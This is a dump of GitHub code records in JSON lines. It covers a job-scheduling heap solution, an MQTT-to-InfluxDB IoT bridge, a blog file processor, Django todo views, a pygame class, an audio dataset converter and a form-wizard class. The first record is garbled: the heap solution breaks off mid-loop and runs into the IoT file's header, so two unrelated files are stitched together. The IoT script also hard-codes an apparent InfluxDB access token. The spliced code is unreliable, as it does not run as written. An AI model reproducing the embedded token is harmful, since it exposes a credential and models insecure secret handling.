+{"seq_id": "38556351800", "text": "import heapq\ndef solution(jobs):\n answer = 0\n start = -1 # 특정 작업의 시작 시간\n time = 0 # 전체 소요 시간\n heapq.heapify(jobs)\n heap = []\n cnt = 0\n while cnt *\r\n#* *\r\n#*Esse arquivo faz parte de um projeto da disciplina Internet das Coisas, ministrada pela*\r\n#*professora Flávia Delicato *\r\n#* *\r\n#*O arquivo se inscreve nos tópicos, e envia-los para o InfluxDB *\r\n#*****************************************************************************************\r\nfrom fastapi import FastAPI\r\nfrom paho import mqtt\r\nfrom fastapi_mqtt import FastMQTT, MQTTConfig\r\nfrom influxdb_client import InfluxDBClient, Point, WritePrecision\r\nfrom influxdb_client.client.write_api import SYNCHRONOUS\r\nimport datetime\r\n\r\nmqtt_broker = 'broker.mqttdashboard.com'\r\nmqtt_port = 1883\r\nmqtt_topic = \"casa/comodos1\"\r\nmqtt_topic2= \"casa/temperatura1\"\r\nfilenamet=\"temperatura.txt\"\r\nfilenamec=\"comodo.txt\"\r\n\r\napp = FastAPI()\r\n\r\nmqtt_config = MQTTConfig(host = mqtt_broker,port = mqtt_port,keepalive = 60)\r\n\r\nmqtt = FastMQTT(config=mqtt_config)\r\n\r\nmqtt.init_app(app)\r\n\r\ntoken = \"1MI7_9MBv6pDLHJKv9NDhmNFMCfaOK3s-6HFgCwRXyT2LM2d29Rtcq9QN0dV2oH-IbEmCh7mMzpvWqR7jSPedg==\"\r\norg = \"UFF-Internet das Coisas\"\r\nbucket = \"trabalho\"\r\n\r\nclient = InfluxDBClient(url=\"http://localhost:8086\", token=token)\r\n\r\nwrite_api = client.write_api(write_options=SYNCHRONOUS)\r\n\r\n@mqtt.on_connect()\r\ndef connect(client, flags, rc, properties):\r\n mqtt.client.subscribe(mqtt_topic) #subscribing mqtt topic\r\n mqtt.client.subscribe(mqtt_topic2)\r\n print(\"Connected: \", client, flags, rc, properties)\r\n\r\n@mqtt.on_message()\r\nasync def message(client, topic, payload, qos, properties):\r\n print(\"Received message: \",topic, payload.decode(), qos, properties)\r\n\r\n \r\n\r\n@mqtt.on_disconnect()\r\ndef disconnect(client, packet, exc=None):\r\n print(\"Disconnected\")\r\n\r\n@mqtt.on_subscribe()\r\ndef subscribe(client, mid, qos, properties):\r\n print(\"subscribed\", client, mid, qos, properties)\r\n \r\n@mqtt.subscribe(mqtt_topic) \r\nasync def get_dado(client,topic, payload, qos, properties): #recebe o tópico cômodos\r\n print(\"data: \", topic, payload.decode(), qos, properties)\r\n s=payload.decode()\r\n x=s.split(\" \")\r\n data = \"casa,comodo=\"+ x[2]+\" valor=1\" #converte para o protocolo em linha\r\n write_api.write(bucket, org, data) #envia para o InfluxDB\r\n\r\n@mqtt.subscribe(mqtt_topic2)\r\nasync def get_temperatura(client,topic,payload,qos,properties):\r\n print(\"data: \", topic, payload.decode(), qos, properties)\r\n s=payload.decode()\r\n x=s.split(\" \")\r\n data = \"casa,temperatura=\"+ x[2]+\" valor=\"+x[3] #converte para o protocolo em linha\r\n write_api.write(bucket, org, data) #envia para o InfluxDB\r\n\r\n\r\n@app.get(\"/teste\")\r\nasync def teste():\r\n return {\"data\"}\r\n \r\n \r\n ", "repo_name": "brenda-gouveia/IoT_project", "sub_path": "interface.py", "file_name": "interface.py", "file_ext": "py", "file_size_in_byte": 3206, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "fastapi.FastAPI", "line_number": 25, "usage_type": "call"}, {"api_name": "fastapi_mqtt.MQTTConfig", "line_number": 27, "usage_type": "call"}, {"api_name": "paho.mqtt", "line_number": 29, "usage_type": "name"}, {"api_name": "fastapi_mqtt.FastMQTT", "line_number": 29, "usage_type": "call"}, {"api_name": "paho.mqtt.init_app", "line_number": 31, "usage_type": 
"call"}, {"api_name": "paho.mqtt", "line_number": 31, "usage_type": "name"}, {"api_name": "influxdb_client.InfluxDBClient", "line_number": 37, "usage_type": "call"}, {"api_name": "influxdb_client.client.write_api.SYNCHRONOUS", "line_number": 39, "usage_type": "name"}, {"api_name": "paho.mqtt.client.subscribe", "line_number": 43, "usage_type": "call"}, {"api_name": "paho.mqtt.client", "line_number": 43, "usage_type": "attribute"}, {"api_name": "paho.mqtt", "line_number": 43, "usage_type": "name"}, {"api_name": "paho.mqtt.client.subscribe", "line_number": 44, "usage_type": "call"}, {"api_name": "paho.mqtt.client", "line_number": 44, "usage_type": "attribute"}, {"api_name": "paho.mqtt", "line_number": 44, "usage_type": "name"}, {"api_name": "paho.mqtt.on_connect", "line_number": 41, "usage_type": "call"}, {"api_name": "paho.mqtt", "line_number": 41, "usage_type": "name"}, {"api_name": "paho.mqtt.on_message", "line_number": 47, "usage_type": "call"}, {"api_name": "paho.mqtt", "line_number": 47, "usage_type": "name"}, {"api_name": "paho.mqtt.on_disconnect", "line_number": 53, "usage_type": "call"}, {"api_name": "paho.mqtt", "line_number": 53, "usage_type": "name"}, {"api_name": "paho.mqtt.on_subscribe", "line_number": 57, "usage_type": "call"}, {"api_name": "paho.mqtt", "line_number": 57, "usage_type": "name"}, {"api_name": "paho.mqtt.subscribe", "line_number": 61, "usage_type": "call"}, {"api_name": "paho.mqtt", "line_number": 61, "usage_type": "name"}, {"api_name": "paho.mqtt.subscribe", "line_number": 69, "usage_type": "call"}, {"api_name": "paho.mqtt", "line_number": 69, "usage_type": "name"}]}
+{"seq_id": "73502896408", "text": "import os\nimport codecs\nimport datetime\nimport fileutils\n\nclass ProcFiles(object):\n def __init__(self, args_dict):\n self.posts_dir = args_dict[\"posts_dir\"]\n self.output_dir = args_dict[\"output_dir\"]\n\n def process(self):\n \"\"\"Given a directory of posts, return a dict representing those posts\n and a dict representing the blog's config.\n Return: (post_list, config_dict)\n \"\"\"\n self.posts_dir = fileutils.add_slash_if_missing(self.posts_dir)\n post_list = []\n for post_filename in os.listdir(self.posts_dir):\n # Process config file\n if post_filename == \"_config\":\n config_dict = self._get_config_info(self.posts_dir+post_filename)\n continue\n # Process LaMark files\n if not post_filename.endswith(\".lm\"):\n continue\n post_info = self._get_post_info(self.posts_dir + post_filename)\n post_list.append(post_info)\n post_list.sort(key=lambda post_info: post_info['date'], reverse=True)\n post_list.append({\n 'type': 'toc',\n 'permalink': 'index.html',\n 'regen': True,\n })\n return (post_list, config_dict)\n\n def _get_post_info(self,post_filename):\n \"\"\"Given the filename of a post, populate a dict representing that post.\n \"\"\"\n post_info = {\n \"title\": None, # Post title\n \"author\": None, # Post author\n \"date\": None, # Date of post\n \"type\": None, # Type: page, post, rss, toc\n \"permalink\": None, # Permanent title of the post \"my-post.html\"\n \"desc\": None, # Post description\n \"body\": None, # Body of the post in LaMark\n \"html_body\": None,\n }\n # Use utf-8, otherwise the markdown module chokes on it.\n with codecs.open(post_filename, encoding='utf-8') as post_file:\n whitespace_count=0\n while True:\n line = post_file.next().strip()\n if line == \"\":\n break\n # Front matter can be surrounded by html comment tags if\n # needed.\n if line == \"\":\n continue\n colon_pos = line.find(\":\")\n if colon_pos == -1:\n raise Exception(\"Invalid front matter line: '%s'\" % line)\n arg_name = line[:colon_pos]\n if arg_name not in post_info.keys():\n raise Exception(\"Unrecognized front matter argument: '%s'\" %\n arg_name)\n post_info[arg_name] = line[colon_pos+1:].strip()\n # Body of post is the rest of the file.\n body = \"\"\n while True:\n try:\n body += post_file.next()\n except StopIteration:\n break\n post_info[\"body\"] = body.strip()\n post_info[\"html_body\"] = body.strip()\n # Convert date string to datetime obj.\n post_info[\"date\"] = datetime.datetime.strptime(\n post_info[\"date\"],\n \"%m-%d-%Y\")\n # Post must end in .html\n post_info[\"permalink\"] += \".html\"\n # Check if the file needs to be regenerated. If the output dir has\n # a file that's the same name as 'permalink', and that file is\n # more recently modified than the '.lm' file, then set regen to\n # False. 
Else True.\n post_stat = os.stat(post_filename)\n try:\n output_stat = os.stat(self.output_dir + post_info[\"permalink\"])\n if post_stat.st_mtime > output_stat.st_mtime:\n post_info[\"regen\"] = True\n else:\n post_info[\"regen\"] = False\n except OSError:\n # File could not be 'stat'd, so file probably doesn't exist yet,\n # meaning it needs to be generated.\n post_info[\"regen\"] = True\n self._validate_post(post_info)\n return post_info\n\n def _validate_post(self, post):\n optionals = [\"desc\"]\n for key in post:\n if key in optionals:\n continue\n if post[key] is None:\n raise Exception(\"Post '%s' is missing front matter '%s'\" %\n (post['title'], key))\n\n def _get_config_info(self,config_filename):\n config_info={\n 'home_url': None,\n 'blog_base_url': None,\n 'blog_title': None,\n 'desc': None,\n }\n with codecs.open(config_filename, encoding='utf-8') as config_file:\n for line in config_file:\n line = line.strip()\n # Skip empty lines or comments (lines beginning with #)\n if len(line) == 0 or line[0] == \"#\":\n continue\n # Colon separates argument name from argument value.\n colon_pos = line.find(\":\")\n if colon_pos == -1:\n continue\n arg_name = line[:colon_pos].strip()\n arg_val = line[colon_pos+1:].strip()\n config_info[arg_name] = arg_val\n required_args = [\n \"blog_base_url\",\n \"blog_title\",\n \"desc\",\n ]\n for arg_name in required_args:\n if config_info.get(arg_name, None) is None:\n raise Exception(\"Config file missing argument: '%s'\" % arg_name)\n return config_info\n", "repo_name": "beala/paleoblogger", "sub_path": "procfiles.py", "file_name": "procfiles.py", "file_ext": "py", "file_size_in_byte": 5728, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "fileutils.add_slash_if_missing", "line_number": 16, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 18, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 50, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 78, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 78, "usage_type": "attribute"}, {"api_name": "os.stat", "line_number": 87, "usage_type": "call"}, {"api_name": "os.stat", "line_number": 89, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 117, "usage_type": "call"}]}
+{"seq_id": "16169517959", "text": "from django.shortcuts import redirect, render \nfrom django.http import HttpResponse, JsonResponse \nfrom todo_app.models import Todo\n\nconvert_into_boolean = {\n \"0\": False,\n \"1\": True,\n}\norder_to_string = {\n \"0\": \"created_at\",\n \"1\": \"-created_at\"\n}\n\n\n\ndef index(request):\n search = request.GET.get(\"todoSearch\")\n completed = request.GET.get(\"completed\")\n order = request.GET.get(\"order\")\n all_todos = Todo.objects.all() \n if search != None: \n all_todos = all_todos.filter(title__icontains = search)\n if completed != None:\n value = convert_into_boolean.get(completed)\n all_todos = Todo.objects.filter(completed=value)\n if order != None:\n value = order_to_string.get(order)\n all_todos = all_todos.order_by(value)\n \n data = {\n \"todo\": all_todos\n }\n return render(request, \"index.html\", context=data)\n\ndef add_view(request):\n if request.method == \"GET\":\n return HttpResponse(\"Invalid Method\")\n else:\n todo_input = request.POST['todoInput']\n print(\"todo_input:\", todo_input)\n Todo.objects.create(title=todo_input)\n return redirect('todo_index')\n\ndef detailed_view(request, todo_id):\n if request.method == \"POST\":\n return HttpResponse(\"Invalid Method\")\n else:\n try:\n todo_object = Todo.objects.get(id=todo_id)\n print(todo_object)\n data = {\n 'id': todo_object.id,\n 'title': todo_object.title,\n 'completed': todo_object.completed,\n 'created_at': todo_object.created_at,\n 'updated_at': todo_object.updated_at,\n }\n return JsonResponse(data)\n except Todo.DoesNotExist:\n return HttpResponse(\"Error Todo not found\")\ndef delete_todo(request, todo_id):\n if request.method == \"GET\":\n return HttpResponse(\"Invalid Method\")\n else:\n try:\n todo_object = Todo.objects.get(id=todo_id)\n todo_object.delete()\n return redirect('todo_index')\n except Todo.DoesNotExist:\n return HttpResponse(\"Error Todo not found\")\n \ndef mark_view(request, todo_id):\n if request.method == \"GET\":\n return HttpResponse(\"Invalid Method\")\n else:\n try:\n todo_object = Todo.objects.get(id=todo_id)\n todo_object.completed = True \n todo_object.save()\n return redirect('todo_index')\n except Todo.DoesNotExist:\n return HttpResponse(\"Error Todo not found\")", "repo_name": "Venugopalreddygithub/django-batch3", "sub_path": "todo_app/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2653, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "todo_app.models.Todo.objects.all", "line_number": 20, "usage_type": "call"}, {"api_name": "todo_app.models.Todo.objects", "line_number": 20, "usage_type": "attribute"}, {"api_name": "todo_app.models.Todo", "line_number": 20, "usage_type": "name"}, {"api_name": "todo_app.models.Todo.objects.filter", "line_number": 25, "usage_type": "call"}, {"api_name": "todo_app.models.Todo.objects", "line_number": 25, "usage_type": "attribute"}, {"api_name": "todo_app.models.Todo", "line_number": 25, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 33, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 37, "usage_type": "call"}, {"api_name": "todo_app.models.Todo.objects.create", "line_number": 41, "usage_type": "call"}, {"api_name": "todo_app.models.Todo.objects", "line_number": 41, "usage_type": "attribute"}, {"api_name": "todo_app.models.Todo", "line_number": 41, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 42, 
"usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 46, "usage_type": "call"}, {"api_name": "todo_app.models.Todo.objects.get", "line_number": 49, "usage_type": "call"}, {"api_name": "todo_app.models.Todo.objects", "line_number": 49, "usage_type": "attribute"}, {"api_name": "todo_app.models.Todo", "line_number": 49, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 58, "usage_type": "call"}, {"api_name": "todo_app.models.Todo.DoesNotExist", "line_number": 59, "usage_type": "attribute"}, {"api_name": "todo_app.models.Todo", "line_number": 59, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 60, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 63, "usage_type": "call"}, {"api_name": "todo_app.models.Todo.objects.get", "line_number": 66, "usage_type": "call"}, {"api_name": "todo_app.models.Todo.objects", "line_number": 66, "usage_type": "attribute"}, {"api_name": "todo_app.models.Todo", "line_number": 66, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 68, "usage_type": "call"}, {"api_name": "todo_app.models.Todo.DoesNotExist", "line_number": 69, "usage_type": "attribute"}, {"api_name": "todo_app.models.Todo", "line_number": 69, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 70, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 74, "usage_type": "call"}, {"api_name": "todo_app.models.Todo.objects.get", "line_number": 77, "usage_type": "call"}, {"api_name": "todo_app.models.Todo.objects", "line_number": 77, "usage_type": "attribute"}, {"api_name": "todo_app.models.Todo", "line_number": 77, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 80, "usage_type": "call"}, {"api_name": "todo_app.models.Todo.DoesNotExist", "line_number": 81, "usage_type": "attribute"}, {"api_name": "todo_app.models.Todo", "line_number": 81, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 82, "usage_type": "call"}]}
+{"seq_id": "1551829395", "text": "import pygame\nfrom pygame.surface import Surface, SurfaceType\nfrom typing import Union\n\n\nclass Circle:\n \"\"\"\n This class represents the circle which appears during the game.\n \"\"\"\n def __init__(self, radius, position, color):\n self.radius = radius\n self.position = position\n self.color = color\n self.rect_obj = pygame.Rect(position[0] - radius, position[1] - radius,\n 2 * radius, 2 * radius)\n\n def draw(self, window: Union[Surface, SurfaceType]):\n \"\"\"\n This circle will be drawn into the window.\n\n :param window: The main window of the game.\n :return:\n \"\"\"\n pygame.draw.circle(window, self.color, self.position, self.radius)\n\n def update_rect_position(self):\n \"\"\"\n The rectangular object's position that wraps the circle will be\n adjusted accordingly.\n :return:\n \"\"\"\n self.rect_obj.x = self.position[0] - self.radius\n self.rect_obj.y = self.position[1] - self.radius\n", "repo_name": "RaduTheMan/bubble_buster", "sub_path": "states/game_in_progress/circle.py", "file_name": "circle.py", "file_ext": "py", "file_size_in_byte": 1037, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pygame.Rect", "line_number": 14, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 17, "usage_type": "name"}, {"api_name": "pygame.surface.Surface", "line_number": 17, "usage_type": "name"}, {"api_name": "pygame.surface.SurfaceType", "line_number": 17, "usage_type": "name"}, {"api_name": "pygame.draw.circle", "line_number": 24, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 24, "usage_type": "attribute"}]}
+{"seq_id": "9004243141", "text": "import os\nimport numpy as np\nfrom scipy.io import wavfile\n\n# Path to the LibriMix folder and selected subfolder\nwsj0_path = '/isip/Students-ro/SpeechSeparation/wsj0-mix'\npublic_path = '/isip/Public/spruenken/wsj0-2mix_normed/'\nsubfolder = ['mix', 's1', 's2']\n\n\ndef bundle_wav_files(dataset, cutout_size=1, wsj0_mix='wsj0-2mix', sampling_rate=8000, sampling_length='min'):\n \"\"\" Convert the .wav-files of a given data set into an 2D-array (.npy-file)\n :param dataset: 'cv', 'tr', 'tt'\n :param cutout_size: length of cutout in seconds\n :param wsj0_mix: 'wsj0-2mix', 'wsj0-3mix' (static für 2mix)\n :param sampling_rate: '8000', '16000'\n :param sampling_length: 'min', 'max'\n \"\"\"\n # Paths\n\n\n # Calculate cutout size and select wav_type-variable\n cutout = sampling_rate * cutout_size\n wav_type = \"wav{}k\".format(sampling_rate // 1000)\n wsj0_mix = \"2speakers\" # Static due to the given folder structure\n\n # Path to the subfolder containing the different types of data for the network\n folder_path = os.path.join(wsj0_path, wsj0_mix, wav_type, sampling_length, dataset)\n\n for subdir in subfolder:\n npy_array = []\n # Subfolder with type of sounds\n subdir_path = os.path.join(folder_path, subdir)\n for file in sorted(os.listdir(subdir_path)):\n # Path including .wav attachment\n file_path = os.path.join(subdir_path, file)\n # Read time series and scale to float32 Wertebereich\n time_series = wavfile.read(file_path)[1]\n time_series = time_series.astype(np.float32) / np.iinfo(np.int16).max\n # Split time series into one seconds sub-arrays\n n = len(time_series)\n for i in range(0, n-(n % cutout), cutout):\n sub_array = []\n sub_array = time_series[i:i+cutout]\n npy_array.append(sub_array)\n # Save the numpy array under the corresponding path\n arr = np.array(npy_array)\n # Adapt the storage path to that of LibriMix\n dataset_correlation = {'cv': 'dev', 'tr': 'train', 'tt': 'test'}\n mix_correlation = {'mix': 'mix_clean', 's1': 's1', 's2': 's2'}\n save_path = os.path.join(public_path, wav_type, sampling_length, dataset_correlation[dataset], mix_correlation[subdir])\n if not os.path.exists(save_path):\n os.makedirs(save_path)\n save_name = 'wsj0-2mix_as_array'\n np.save(os.path.join(save_path, save_name + '.npy'), arr)\n np.savez_compressed(os.path.join(save_path, save_name + '.npz'), arr=arr, allow_pickle=True, pickle_protocol=2)\n print('Saved under: ', os.path.join(save_path, save_name + '.npy'))\n\n\nif __name__ == '__main__':\n for j in ['cv', 'tr', 'tt']: # cv := val, tr := train, tt := test\n bundle_wav_files(j)\n\n print('Datensatz für 8000 wurde erstellt')\n\n for j in ['cv', 'tr', 'tt']: # cv := val, tr := train, tt := test\n bundle_wav_files(j, sampling_rate=16000)\n", "repo_name": "moibrgit/MA23", "sub_path": "04_SepFormer_Ref/Code/datasets/wsj0-2mix/wsj0_to_npy.py", "file_name": "wsj0_to_npy.py", "file_ext": "py", "file_size_in_byte": 2981, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path", "line_number": 33, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": 
"attribute"}, {"api_name": "scipy.io.wavfile.read", "line_number": 38, "usage_type": "call"}, {"api_name": "scipy.io.wavfile", "line_number": 38, "usage_type": "name"}, {"api_name": "numpy.float32", "line_number": 39, "usage_type": "attribute"}, {"api_name": "numpy.iinfo", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 39, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path", "line_number": 51, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path", "line_number": 52, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path", "line_number": 55, "usage_type": "attribute"}, {"api_name": "numpy.savez_compressed", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path", "line_number": 57, "usage_type": "attribute"}]}
+{"seq_id": "1707946320", "text": "import zope.component\nimport zope.interface\nfrom z3c.form import button\nfrom z3c.formui import form\nfrom zope.publisher.interfaces import NotFound\nfrom zope.traversing.browser import absoluteURL\n\nfrom z3c.wizard import interfaces\nfrom z3c.wizard.button import WizardButtonActions\n\n\ndef nameStep(step, name):\n \"\"\"Give a step a __name__.\"\"\"\n step.__name__ = name\n return step\n\n\n@zope.interface.implementer(interfaces.IWizard)\nclass Wizard(form.Form):\n \"\"\"Wizard form.\n\n The wizard is responsible for manage the steps and offers the wizard menu\n navigation and knows the step order. The wizard can check the conditions\n given from the steps. The wizard is also responsible for delegate the\n back, next and complete actions to the steps.\n\n This IWizard object is modelled as a Controller known from the MVC\n (Model, view, controller) patter version 2.0 and the step is implemented as\n a view.\n \"\"\"\n\n buttons = button.Buttons(interfaces.IWizardButtons)\n\n # customize this part if needed\n stepInterface = interfaces.IStep\n\n firstStepAsDefault = True\n adjustStep = True\n confirmationPageName = None\n nextURL = None\n\n cssActive = 'selected'\n cssInActive = None # None will skip class attribute in DOM element\n\n # for internal use\n __name__ = None\n step = None\n\n @property\n def baseURL(self):\n return absoluteURL(self, self.request)\n\n def setUpSteps(self):\n \"\"\"Return a list of steps. This implementation uses IStep adapters.\n\n Take a look at the addStep method defined in step.py. This method\n allows you to setup steps directly in the method and offers an API for\n customized step setup.\n \"\"\"\n steps = list(zope.component.getAdapters(\n (self.context, self.request, self), self.stepInterface))\n return [nameStep(step, name) for name, step in steps]\n\n def filterSteps(self, steps):\n \"\"\"Make sure to only select available steps and we give a name.\"\"\"\n return [step for step in steps if step.available]\n\n def orderSteps(self, steps):\n # order steps by it's weight\n return sorted(steps, key=lambda step: step.weight)\n\n @property\n def steps(self):\n steps = self.setUpSteps()\n steps = self.filterSteps(steps)\n return self.orderSteps(steps)\n\n @property\n def completed(self):\n for step in self.steps:\n if not step.completed:\n return False\n return True\n\n @property\n def isFirstStep(self):\n \"\"\"See interfaces.IWizard\"\"\"\n return self.step and self.step.__name__ == self.steps[0].__name__\n\n @property\n def isLastStep(self):\n \"\"\"See interfaces.IWizard\"\"\"\n return self.step and self.step.__name__ == self.steps[-1].__name__\n\n @property\n def showBackButton(self):\n \"\"\"Ask the step.\"\"\"\n return self.step and self.step.showBackButton\n\n @property\n def showNextButton(self):\n \"\"\"Ask the step.\"\"\"\n return self.step and self.step.showNextButton\n\n @property\n def showCompleteButton(self):\n \"\"\"Ask the step.\"\"\"\n return self.step.showCompleteButton\n\n @property\n def previousStepName(self):\n if self.step is None:\n return\n stepNames = [step.__name__ for step in self.steps]\n idx = stepNames.index(self.step.__name__)\n if idx == 0:\n return\n return stepNames[idx - 1]\n\n @property\n def nextStepName(self):\n if self.step is None:\n return\n stepNames = [step.__name__ for step in self.steps]\n idx = stepNames.index(self.step.__name__)\n if idx == len(stepNames) - 1:\n return\n return stepNames[idx + 1]\n\n @property\n def stepMenu(self):\n items = []\n append = items.append\n 
lenght = len(self.steps) - 1\n for idx, step in enumerate(self.steps):\n firstStep = False\n lastStep = False\n if step.visible:\n isSelected = self.step and self.step.__name__ == step.__name__\n cssClass = isSelected and self.cssActive or self.cssInActive\n if idx == 0:\n firstStep = True\n if idx == lenght:\n lastStep = True\n append({\n 'name': step.__name__,\n 'title': step.label,\n 'number': str(idx + 1),\n 'url': '{}/{}'.format(self.baseURL, step.__name__),\n 'selected': self.step.__name__ == step.__name__,\n 'class': cssClass,\n 'first': firstStep,\n 'last': lastStep\n })\n return items\n\n def getDefaultStep(self):\n \"\"\"Can return the first or first not completed step as default.\"\"\"\n # return first step if this option is set\n if self.firstStepAsDefault:\n return self.steps[0]\n # return first not completed step\n for step in self.steps:\n if not step.completed:\n return step\n # fallback to first step if all steps completed\n return self.steps[0]\n\n def doAdjustStep(self):\n # Make sure all previous steps got completed. If not, redirect to the\n # last incomplete step\n if not self.adjustStep:\n return False\n for step in self.steps:\n if step.__name__ is self.step.__name__:\n break\n if not step.completed:\n # prepare redirect to not completed step and return True\n self.nextURL = '{}/{}'.format(self.baseURL, step.__name__)\n return True\n # or return False\n return False\n\n def updateActions(self):\n self.actions = WizardButtonActions(self, self.request, self.context)\n self.actions.update()\n\n def update(self):\n if self.doAdjustStep():\n return\n self.updateActions()\n\n def publishTraverse(self, request, name):\n \"\"\"Traverse to step by it's name.\"\"\"\n # Remove HTML ending\n if '.' in name:\n rawName = name.rsplit('.', 1)[0]\n else:\n rawName = name\n # Find the active step\n for step in self.steps:\n if step.__name__ == rawName:\n self.step = step\n return self.step\n raise NotFound(self, name, request)\n\n def browserDefault(self, request):\n \"\"\"The default step is our browserDefault traversal setp.\"\"\"\n if self.step is None:\n step = self.getDefaultStep()\n # always return default step as default view for our wizard\n return self, (step.__name__,)\n\n def goToStep(self, stepName):\n self.nextURL = '{}/{}'.format(self.baseURL, stepName)\n\n def goToBack(self):\n # redirect to next step if previous get sucessfuly processed\n self.goToStep(self.previousStepName)\n\n def goToNext(self):\n # redirect to next step if previous get sucessfuly processed\n self.goToStep(self.nextStepName)\n\n def doBack(self, action):\n if self.step.doBack(action):\n self.goToBack()\n\n def doNext(self, action):\n if self.step.doNext(action):\n self.goToNext()\n\n def doComplete(self, action):\n if self.step.doComplete(action):\n # do finsih after step get completed is completed\n self.doFinish()\n\n def doFinish(self):\n \"\"\"Force redirect after doComplete if confirmationPageName is given.\"\"\"\n if self.confirmationPageName is not None:\n self.nextURL = '{}/{}'.format(\n absoluteURL(self.context, self.request),\n self.confirmationPageName)\n\n @button.handler(interfaces.IWizardButtons['back'])\n def handleBack(self, action):\n self.doBack(action)\n\n @button.handler(interfaces.IWizardButtons['next'])\n def handleNext(self, action):\n self.doNext(action)\n\n @button.handler(interfaces.IWizardButtons['complete'])\n def handleComplete(self, action):\n self.doComplete(action)\n\n def render(self, *args, **kws):\n raise NotImplementedError('render is no supported')\n\n def 
__repr__(self):\n return \"<{} '{}'>\".format(self.__class__.__name__, self.__name__)\n", "repo_name": "zopefoundation/z3c.wizard", "sub_path": "src/z3c/wizard/wizard.py", "file_name": "wizard.py", "file_ext": "py", "file_size_in_byte": 8313, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "z3c.formui.form.Form", "line_number": 19, "usage_type": "attribute"}, {"api_name": "z3c.formui.form", "line_number": 19, "usage_type": "name"}, {"api_name": "z3c.form.button.Buttons", "line_number": 32, "usage_type": "call"}, {"api_name": "z3c.form.button", "line_number": 32, "usage_type": "name"}, {"api_name": "z3c.wizard.interfaces.IWizardButtons", "line_number": 32, "usage_type": "attribute"}, {"api_name": "z3c.wizard.interfaces", "line_number": 32, "usage_type": "name"}, {"api_name": "z3c.wizard.interfaces.IStep", "line_number": 35, "usage_type": "attribute"}, {"api_name": "z3c.wizard.interfaces", "line_number": 35, "usage_type": "name"}, {"api_name": "zope.traversing.browser.absoluteURL", "line_number": 51, "usage_type": "call"}, {"api_name": "zope.component.component.getAdapters", "line_number": 60, "usage_type": "call"}, {"api_name": "zope.component.component", "line_number": 60, "usage_type": "attribute"}, {"api_name": "zope.component", "line_number": 60, "usage_type": "name"}, {"api_name": "z3c.wizard.button.WizardButtonActions", "line_number": 185, "usage_type": "call"}, {"api_name": "zope.publisher.interfaces.NotFound", "line_number": 205, "usage_type": "call"}, {"api_name": "zope.traversing.browser.absoluteURL", "line_number": 242, "usage_type": "call"}, {"api_name": "z3c.form.button.handler", "line_number": 245, "usage_type": "call"}, {"api_name": "z3c.form.button", "line_number": 245, "usage_type": "name"}, {"api_name": "z3c.wizard.interfaces.IWizardButtons", "line_number": 245, "usage_type": "attribute"}, {"api_name": "z3c.wizard.interfaces", "line_number": 245, "usage_type": "name"}, {"api_name": "z3c.form.button.handler", "line_number": 249, "usage_type": "call"}, {"api_name": "z3c.form.button", "line_number": 249, "usage_type": "name"}, {"api_name": "z3c.wizard.interfaces.IWizardButtons", "line_number": 249, "usage_type": "attribute"}, {"api_name": "z3c.wizard.interfaces", "line_number": 249, "usage_type": "name"}, {"api_name": "z3c.form.button.handler", "line_number": 253, "usage_type": "call"}, {"api_name": "z3c.form.button", "line_number": 253, "usage_type": "name"}, {"api_name": "z3c.wizard.interfaces.IWizardButtons", "line_number": 253, "usage_type": "attribute"}, {"api_name": "z3c.wizard.interfaces", "line_number": 253, "usage_type": "name"}, {"api_name": "zope.component.interface.implementer", "line_number": 18, "usage_type": "call"}, {"api_name": "zope.component.interface", "line_number": 18, "usage_type": "attribute"}, {"api_name": "zope.component", "line_number": 18, "usage_type": "name"}, 